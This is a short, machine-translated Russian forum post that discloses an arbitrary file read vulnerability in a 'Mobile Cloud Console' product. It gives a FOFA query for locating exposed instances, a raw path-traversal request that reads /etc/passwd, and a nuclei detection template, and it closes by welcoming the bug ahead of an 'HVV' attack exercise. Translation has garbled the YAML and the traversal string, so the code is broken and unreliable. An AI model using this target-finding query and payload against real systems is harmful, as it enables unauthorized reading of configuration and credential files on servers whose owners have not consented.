Уязвимость произвольного чтения файлов в мобильной облачной консоли
Mobile Cloud Console - это система, используемая для просмотра и управления мобильными облачными продуктами и сервисами в единой манере. В Mobile Cloud Console существует уязвимость произвольного чтения файлов, которая может быть использована неавторизованными злоумышленниками для чтения конфиденциальной информации, например, файлов конфигурации веб-сайта.
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
poc
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Хост: ip
Ямл
id: cmecloud-console-readfile
информация: имя: cmecloud-console-readfile
название: cmecloud-console-readfile
автор: onewin
серьёзность: высокая
описание: Мобильная облачная консоль существует для чтения произвольных файлов
http.
- raw.
- |+
@timeout: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-условие: и
matchers: {{Hostname}}
- тип: статус
статус: {{Hostname}} matchers-condition: и matchers: type: status
- 200
- тип: слово
слова.
- "корень"
часть: тело-
Текущий ответ принимается как лучший
HVV Вот-вот начнется, и тут появляется лазейка. :)
3 недель назад Нет комментариев
Пожалуйста, логин или регистрация, чтобы добавить комментарий.